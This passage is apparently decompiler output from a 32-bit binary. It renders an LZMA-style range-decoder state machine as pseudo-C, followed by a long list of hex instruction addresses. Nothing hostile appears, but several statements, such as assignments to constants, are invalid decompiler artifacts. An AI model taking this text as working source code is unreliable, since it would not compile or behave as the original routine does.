													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}













                                                          0x00000000
                                                          0x0040638c
                                                          0x0040638c
                                                          0x00406390
                                                          0x004063b9
                                                          0x004063c3
                                                          0x00406392
                                                          0x0040639b
                                                          0x004063a8
                                                          0x004063ab
                                                          0x004066ef
                                                          0x004066ef
                                                          0x004066f2
                                                          0x004066f2
                                                          0x004066f2
                                                          0x004066f8
                                                          0x004066fe
                                                          0x00406704
                                                          0x0040671e
                                                          0x00406721
                                                          0x00406727
                                                          0x00406732
                                                          0x00406734
                                                          0x00406706
                                                          0x00406706
                                                          0x00406715
                                                          0x00406719
                                                          0x00406719
                                                          0x0040673e
                                                          0x00000000
                                                          0x00000000
                                                          0x00406740
                                                          0x00406744
                                                          0x004068f3
                                                          0x00406909
                                                          0x00406911
                                                          0x00406918
                                                          0x0040691a
                                                          0x00406921
                                                          0x00406925
                                                          0x00406925
                                                          0x00406750
                                                          0x00406757
                                                          0x0040675f
                                                          0x00406762
                                                          0x00406765
                                                          0x00406765
                                                          0x0040676b
                                                          0x0040676b
                                                          0x00405f07
                                                          0x00405f07
                                                          0x00405f07
                                                          0x00405f10
                                                          0x00000000
                                                          0x00000000
                                                          0x00405f16
                                                          0x00000000
                                                          0x00405f21
                                                          0x00000000
                                                          0x00000000
                                                          0x00405f2a
                                                          0x00405f2d
                                                          0x00405f30
                                                          0x00405f34
                                                          0x00000000
                                                          0x00000000
                                                          0x00405f3a
                                                          0x00405f3d
                                                          0x00405f3f
                                                          0x00405f40
                                                          0x00405f43
                                                          0x00405f45
                                                          0x00405f46
                                                          0x00405f48
                                                          0x00405f4b
                                                          0x00405f50
                                                          0x00405f55
                                                          0x00405f5e
                                                          0x00405f71
                                                          0x00405f74
                                                          0x00405f80
                                                          0x00405fa8
                                                          0x00405faa
                                                          0x00405fb8
                                                          0x00405fb8
                                                          0x00405fbc
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405fac
                                                          0x00405fac
                                                          0x00405faf
                                                          0x00405fb0
                                                          0x00405fb0
                                                          0x00000000
                                                          0x00405fac
                                                          0x00405f86
                                                          0x00405f8b
                                                          0x00405f8b
                                                          0x00405f94
                                                          0x00405f9c
                                                          0x00405f9f
                                                          0x00000000
                                                          0x00405fa5
                                                          0x00405fa5
                                                          0x00000000
                                                          0x00405fa5
                                                          0x00000000
                                                          0x00405fc2
                                                          0x00405fc2
                                                          0x00405fc6
                                                          0x00406872
                                                          0x00000000
                                                          0x00406872
                                                          0x00405fcf
                                                          0x00405fdf
                                                          0x00405fe2
                                                          0x00405fe5
                                                          0x00405fe5
                                                          0x00405fe5
                                                          0x00405fe8
                                                          0x00405fec
                                                          0x00000000
                                                          0x00000000
                                                          0x00405fee
                                                          0x00405ff4
                                                          0x0040601e
                                                          0x00406024
                                                          0x0040602b
                                                          0x00000000
                                                          0x0040602b
                                                          0x00405ffa
                                                          0x00405ffd
                                                          0x00406002
                                                          0x00406002
                                                          0x0040600d
                                                          0x00406015
                                                          0x00406018
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040605d
                                                          0x00406063
                                                          0x00406066
                                                          0x00406073
                                                          0x0040607b
                                                          0x004066ef
                                                          0x00000000
                                                          0x00000000
                                                          0x00406032
                                                          0x00406032
                                                          0x00406036
                                                          0x00406881
                                                          0x00000000
                                                          0x00406881
                                                          0x00406042
                                                          0x0040604d
                                                          0x0040604d
                                                          0x0040604d
                                                          0x00406050
                                                          0x00406053
                                                          0x00406056
                                                          0x0040605b
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004066f2
                                                          0x004066f2
                                                          0x004066f8
                                                          0x004066fe
                                                          0x00406704
                                                          0x0040671e
                                                          0x00406721
                                                          0x00406727
                                                          0x00406732
                                                          0x00406734
                                                          0x00406706
                                                          0x00406706
                                                          0x00406715
                                                          0x00406719
                                                          0x00406719
                                                          0x0040673e
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406083
                                                          0x00406085
                                                          0x00406088
                                                          0x004060f9
                                                          0x004060fc
                                                          0x004060ff
                                                          0x00406106
                                                          0x00406110
                                                          0x004066ef
                                                          0x004066ef
                                                          0x00000000
                                                          0x004066ef
                                                          0x004066ef
                                                          0x0040608a
                                                          0x0040608e
                                                          0x00406091
                                                          0x00406093
                                                          0x00406096
                                                          0x00406099
                                                          0x0040609b
                                                          0x0040609e
                                                          0x004060a0
                                                          0x004060a5
                                                          0x004060a8
                                                          0x004060ab
                                                          0x004060af
                                                          0x004060b6
                                                          0x004060b9
                                                          0x004060c0
                                                          0x004060c4
                                                          0x004060cc
                                                          0x004060cc
                                                          0x004060cc
                                                          0x004060c6
                                                          0x004060c6
                                                          0x004060c6
                                                          0x004060bb
                                                          0x004060bb
                                                          0x004060bb
                                                          0x004060d0
                                                          0x004060d3
                                                          0x004060f1
                                                          0x004060f3
                                                          0x00000000
                                                          0x004060d5
                                                          0x004060d5
                                                          0x004060d8
                                                          0x004060db
                                                          0x004060de
                                                          0x004060e0
                                                          0x004060e0
                                                          0x004060e0
                                                          0x004060e3
                                                          0x004060e6
                                                          0x004060e8
                                                          0x004060e9
                                                          0x004060ec
                                                          0x00000000
                                                          0x004060ec
                                                          0x00000000
                                                          0x00406322
                                                          0x00406326
                                                          0x00406344
                                                          0x00406347
                                                          0x0040634e
                                                          0x00406351
                                                          0x00406354
                                                          0x00406357
                                                          0x0040635a
                                                          0x0040635d
                                                          0x0040635f
                                                          0x00406366
                                                          0x00406367
                                                          0x00406369
                                                          0x0040636c
                                                          0x0040636f
                                                          0x00406372
                                                          0x00406372
                                                          0x00406377
                                                          0x00000000
                                                          0x00406377
                                                          0x00406328
                                                          0x0040632b
                                                          0x0040632e
                                                          0x00406338
                                                          0x004066ef
                                                          0x004066ef
                                                          0x00000000
                                                          0x004066ef
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004063cf
                                                          0x004063d3
                                                          0x00000000
                                                          0x00000000
                                                          0x004063d9
                                                          0x004063dd
                                                          0x00000000
                                                          0x00000000
                                                          0x004063e3
                                                          0x004063e5
                                                          0x004063e9
                                                          0x004063e9
                                                          0x004063ec
                                                          0x004063f0
                                                          0x00000000
                                                          0x00000000
                                                          0x00406440
                                                          0x00406444
                                                          0x0040644b
                                                          0x0040644e
                                                          0x00406451
                                                          0x0040645b
                                                          0x004066ef
                                                          0x004066ef
                                                          0x00000000
                                                          0x004066ef
                                                          0x004066ef
                                                          0x00406446
                                                          0x00000000
                                                          0x00000000
                                                          0x00406467
                                                          0x0040646b
                                                          0x00406472
                                                          0x00406475
                                                          0x00406478
                                                          0x0040646d
                                                          0x0040646d
                                                          0x0040646d
                                                          0x0040647b
                                                          0x0040647e
                                                          0x00406481
                                                          0x00406481
                                                          0x00406484
                                                          0x00406487
                                                          0x0040648a
                                                          0x0040648a
                                                          0x0040648d
                                                          0x00406494
                                                          0x00406499
                                                          0x00000000
                                                          0x00000000
                                                          0x00406527
                                                          0x00406527
                                                          0x0040652b
                                                          0x004068c9
                                                          0x00000000
                                                          0x004068c9
                                                          0x00406531
                                                          0x00406534
                                                          0x00406537
                                                          0x0040653b
                                                          0x0040653e
                                                          0x00406544
                                                          0x00406546
                                                          0x00406546
                                                          0x00406546
                                                          0x00406549
                                                          0x0040654c
                                                          0x00000000
                                                          0x00000000
                                                          0x0040611c
                                                          0x0040611c
                                                          0x00406120
                                                          0x0040688d
                                                          0x00000000
                                                          0x0040688d
                                                          0x00406126
                                                          0x00406129
                                                          0x0040612c
                                                          0x00406130
                                                          0x00406133
                                                          0x00406139
                                                          0x0040613b
                                                          0x0040613b
                                                          0x0040613b
                                                          0x0040613e
                                                          0x00406141
                                                          0x00406141
                                                          0x00406144
                                                          0x00406147
                                                          0x00000000
                                                          0x00000000
                                                          0x0040614d
                                                          0x00406153
                                                          0x00000000
                                                          0x00000000
                                                          0x00406159
                                                          0x00406159
                                                          0x0040615d
                                                          0x00406160
                                                          0x00406163
                                                          0x00406166
                                                          0x00406169
                                                          0x0040616a
                                                          0x0040616d
                                                          0x0040616f
                                                          0x00406175
                                                          0x00406178
                                                          0x0040617b
                                                          0x0040617e
                                                          0x00406181
                                                          0x00406184
                                                          0x00406187
                                                          0x004061a3
                                                          0x004061a6
                                                          0x004061a9
                                                          0x004061ac
                                                          0x004061b3
                                                          0x004061b7
                                                          0x004061b9
                                                          0x004061bd
                                                          0x00406189
                                                          0x00406189
                                                          0x0040618d
                                                          0x00406195
                                                          0x0040619a
                                                          0x0040619c
                                                          0x0040619e
                                                          0x0040619e
                                                          0x004061c0
                                                          0x004061c7
                                                          0x004061ca
                                                          0x00000000
                                                          0x004061d0
                                                          0x00000000
                                                          0x004061d0
                                                          0x00000000
                                                          0x004061d5
                                                          0x004061d5
                                                          0x004061d9
                                                          0x00406899
                                                          0x00000000
                                                          0x00406899
                                                          0x004061df
                                                          0x004061e2
                                                          0x004061e5
                                                          0x004061e9
                                                          0x004061ec
                                                          0x004061f2
                                                          0x004061f4
                                                          0x004061f4
                                                          0x004061f4
                                                          0x004061f7
                                                          0x004061fa
                                                          0x004061fa
                                                          0x004061fa
                                                          0x00406200
                                                          0x00000000
                                                          0x00000000
                                                          0x00406202
                                                          0x00406205
                                                          0x00406208
                                                          0x0040620b
                                                          0x0040620e
                                                          0x00406211
                                                          0x00406214
                                                          0x00406217
                                                          0x0040621a
                                                          0x0040621d
                                                          0x00406220
                                                          0x00406238
                                                          0x0040623b
                                                          0x0040623e
                                                          0x00406241
                                                          0x00406241
                                                          0x00406244
                                                          0x00406248
                                                          0x0040624a
                                                          0x00406222
                                                          0x00406222
                                                          0x0040622a
                                                          0x0040622f
                                                          0x00406231
                                                          0x00406233
                                                          0x00406233
                                                          0x0040624d
                                                          0x00406254
                                                          0x00406257
                                                          0x00000000
                                                          0x00406259
                                                          0x00000000
                                                          0x00406259
                                                          0x00406257
                                                          0x0040625e
                                                          0x0040625e
                                                          0x0040625e
                                                          0x0040625e
                                                          0x00000000
                                                          0x00000000
                                                          0x00406299
                                                          0x00406299
                                                          0x0040629d
                                                          0x004068a5
                                                          0x00000000
                                                          0x004068a5
                                                          0x004062a3
                                                          0x004062a6
                                                          0x004062a9
                                                          0x004062ad
                                                          0x004062b0
                                                          0x004062b6
                                                          0x004062b8
                                                          0x004062b8
                                                          0x004062b8
                                                          0x004062bb
                                                          0x004062be
                                                          0x004062be
                                                          0x004062c4
                                                          0x00406262
                                                          0x00406262
                                                          0x00406265
                                                          0x00000000
                                                          0x00406265
                                                          0x004062c6
                                                          0x004062c6
                                                          0x004062c9
                                                          0x004062cc
                                                          0x004062cf
                                                          0x004062d2
                                                          0x004062d5
                                                          0x004062d8
                                                          0x004062db
                                                          0x004062de
                                                          0x004062e1
                                                          0x004062e4
                                                          0x004062fc
                                                          0x004062ff
                                                          0x00406302
                                                          0x00406305
                                                          0x00406305
                                                          0x00406308
                                                          0x0040630c
                                                          0x0040630e
                                                          0x004062e6
                                                          0x004062e6
                                                          0x004062ee
                                                          0x004062f3
                                                          0x004062f5
                                                          0x004062f7
                                                          0x004062f7
                                                          0x00406311
                                                          0x00406318
                                                          0x0040631b
                                                          0x00000000
                                                          0x0040631d
                                                          0x00000000
                                                          0x0040631d
                                                          0x00000000
                                                          0x004065aa
                                                          0x004065aa
                                                          0x004065ae
                                                          0x004068d5
                                                          0x00000000
                                                          0x004068d5
                                                          0x004065b4
                                                          0x004065b7
                                                          0x004065ba
                                                          0x004065be
                                                          0x004065c1
                                                          0x004065c7
                                                          0x004065c9
                                                          0x004065c9
                                                          0x004065c9
                                                          0x004065cc
                                                          0x00000000
                                                          0x00000000
                                                          0x0040637a
                                                          0x0040637a
                                                          0x0040637d
                                                          0x004066ef
                                                          0x004066ef
                                                          0x00000000
                                                          0x004066ef
                                                          0x00000000
                                                          0x004066b9
                                                          0x004066bd
                                                          0x004066df
                                                          0x004066e2
                                                          0x004066ec
                                                          0x004066ef
                                                          0x004066ef
                                                          0x00000000
                                                          0x004066ef
                                                          0x004066ef
                                                          0x004066bf
                                                          0x004066c2
                                                          0x004066c6
                                                          0x004066c9
                                                          0x004066c9
                                                          0x004066cc
                                                          0x00000000
                                                          0x00000000
                                                          0x00406776
                                                          0x0040677a
                                                          0x00406798
                                                          0x00406798
                                                          0x00406798
                                                          0x0040679f
                                                          0x004067a6
                                                          0x004067ad
                                                          0x004067ad
                                                          0x00000000
                                                          0x004067ad
                                                          0x0040677c
                                                          0x0040677f
                                                          0x00406782
                                                          0x00406785
                                                          0x0040678c
                                                          0x004066d0
                                                          0x004066d0
                                                          0x004066d3
                                                          0x00000000
                                                          0x00000000
                                                          0x00406867
                                                          0x0040686a
                                                          0x0040676b
